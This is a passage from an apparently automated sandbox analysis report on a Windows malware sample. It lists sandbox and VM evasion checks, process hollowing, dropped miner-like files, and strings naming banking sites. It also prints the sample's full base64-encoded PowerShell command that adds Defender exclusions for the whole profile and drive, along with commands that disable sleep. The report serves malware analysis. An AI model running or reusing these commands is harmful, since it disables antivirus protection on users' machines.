                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeMemory allocated: 4F90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599557Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599448Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599122Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599012Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeWindow / User API: threadDelayed 6445Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeWindow / User API: threadDelayed 653Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeWindow / User API: threadDelayed 2324Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7539Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2218Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exe TID: 4732Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exe TID: 1696Thread sleep count: 6445 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7440Thread sleep count: 653 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -599557s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7440Thread sleep count: 2324 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -599448s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 3816Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -599122s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -599012s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -598906s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -598797s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -598688s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -598563s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -598453s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -598219s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384Thread sleep time: -598110s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5976Thread sleep count: 7539 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5932Thread sleep count: 2218 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5192Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CFFCDE FindFirstFileExW,0_2_00CFFCDE
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CFFD8F
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CFFCDE FindFirstFileExW,2_2_00CFFCDE
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00CFFD8F
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599557Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599448Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599122Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 599012Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: ZHKYZWVTC38PGAWGZF49K.exe.2.drBinary or memory string: Vmwaretrat
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: ZHKYZWVTC38PGAWGZF49K.exe.2.drBinary or memory string: vboxservice
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: setupx 1.exe1.exe, 00000002.00000002.2255302659.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182620812.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308691400.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139748232.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113318598.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113138099.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: ZHKYZWVTC38PGAWGZF49K.exe.2.drBinary or memory string: Vmwareuser
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308460293.000000000386A000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2258316500.000000000386C000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.drBinary or memory string: vboxtray
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: setupx 1.exe1.exe, 00000002.00000002.2255302659.0000000000F32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1287987853.0000000001344000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                  Source: ZHKYZWVTC38PGAWGZF49K.exe.2.drBinary or memory string: Vmtoolsd
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00C8553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,0_2_00C8553B
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CEDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CEDC9E
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00D161B4 mov edi, dword ptr fs:[00000030h]0_2_00D161B4
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CFB71C GetProcessHeap,0_2_00CFB71C
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CED8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CED8E2
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CEDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CEDC9E
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CEDC92 SetUnhandledExceptionFilter,0_2_00CEDC92
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CF5DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CF5DCE
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CED8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00CED8E2
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CEDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00CEDC9E
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CF5DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00CF5DCE
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00D161B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00D161B4
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#U9o0#> Add-MpPreference <#iuH#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#mVB5jvoc#> -Force <#C8V#>
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#U9o0#> Add-MpPreference <#iuH#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#mVB5jvoc#> -Force <#C8V#>Jump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeMemory written: C:\Users\user\Desktop\setupx 1.exe1.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate offJump to behavior
